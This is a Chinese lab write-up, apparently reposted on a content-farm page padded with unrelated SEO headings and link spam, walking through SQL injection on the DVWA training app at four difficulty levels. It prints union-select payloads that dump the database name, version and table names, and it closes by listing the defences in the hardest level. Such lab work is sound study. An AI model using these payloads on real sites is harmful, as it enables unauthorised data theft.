当前位置: 首页 > wzjs >正文

国家企业信息公示(全国)北京外贸网站优化

国家企业信息公示(全国),北京外贸网站优化,开发一个oa系统多少钱,wordpress取消作者LOW: f12打开hackbar 一:判断注入类型 输入id1报错 闭合单引号 ,页面恢复正常 所以为单引号字符型 二:开始攻击 1.判断列数 ?id1 order by 2-- 到3的时候开始报错,所以一共两列 2.爆回显位置 ?id-1 union s…

LOW:

f12打开hackbar

 一:判断注入类型

输入id=1'报错

闭合单引号 ,页面恢复正常

所以为单引号字符型

二:开始攻击

1.判断列数

?id=1' order by 2--+

到3的时候开始报错,所以一共两列 

2.爆回显位置

?id=-1' union select 2,3--+

 

3.爆数据库名和版本号

?id=-1' union select database(),version()--+

4.爆表名

?id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

5.爆库名

 (1)guestbook

(2)users

 6.爆guestbook的数据:

MEDIUM:

发现界面变成了这样:

随便提交一个,submit的时候用bp抓包

抓到这些,我们发现这一关的提交形式从get变成了post,格式以红框内为准

继续打开hackbar,发现单引号双引号括号无论闭合不闭合都报错,所以我们判断为数字型

id=1 order by 3&Submit=Submit

到3的时候报错,所以一共两列 

剩下的表单爆数据不再过多赘述 

HIGH:

1' and 1=1#
1' and 1=2#

前者正常,后者无回显,所以是字符型注入

剩下回显和low一样 

IMPOSSIBLE:

优化部分:

checkToken($_REQUEST['user_token'], $_SESSION['session_token'], 'index.php');

1.checktoken() 

2.mysqli_real_escape_string()转义函数去除反斜杠

3.pdo预处理,参数化查询

4.limit 1限制返回结果

5.generateSessionToken()在文件末尾生成新token供下次使用

6.captcha验证(recaptcha_check_answer())(人机验证)

http://www.dtcms.com/wzjs/288357.html

相关文章:

  • 做地区招聘网站搜索引擎优化要考虑哪些方面?
  • 深圳网站设计+建设首选快推广app下载
  • 学javaweb可以做网站嘛网站网络推广运营
  • 网站建设的相关技术百度网盘app下载安装电脑版
  • 网站实名认证需要什么雅思培训班价格一般多少
  • 免费网站空间phpseo免费课程
  • 青岛公司做网站美国搜索引擎
  • 旅游网页设计说明200字系统优化的意义
  • 做户外运动的网站黄页网推广服务
  • 读网站建设一定要买电脑实践吗上海最新疫情
  • 校园图书馆网站建设品牌营销策划ppt
  • 站长工具亚洲中文精品app拉新推广平台渠道
  • 企业网站建设的一般要素网络服务器地址怎么查
  • 做网站颜色类型是啥在线识别图片百度识图
  • 天津武清做网站tjniu重庆网络seo公司
  • 大连微网站百度关键词竞价价格
  • 做网站开发的流程搜索关键词的软件
  • 做app找哪个网站seo网址优化靠谱
  • 58网站 做现浇混凝土百度推广怎么登陆
  • 最有效的网站推广方案百度榜单
  • 找别人做网站注意什么网站点击排名优化
  • 做一个自己网站的步骤用模板快速建站
  • 做网站界面需要注意什么江小白网络营销案例
  • win7 iis建立网站百度站长工具网站
  • 利用jsp做网站安卓手机优化大师官方下载
  • 做网站开发学什么软件最近发生的重大新闻事件
  • 泰益优网站开发公司珠海百度搜索排名优化
  • 开原网站建设怎样进行网络推广效果更好
  • 28网站开发百度高级搜索怎么用
  • 通化网站制作网站免费搭建平台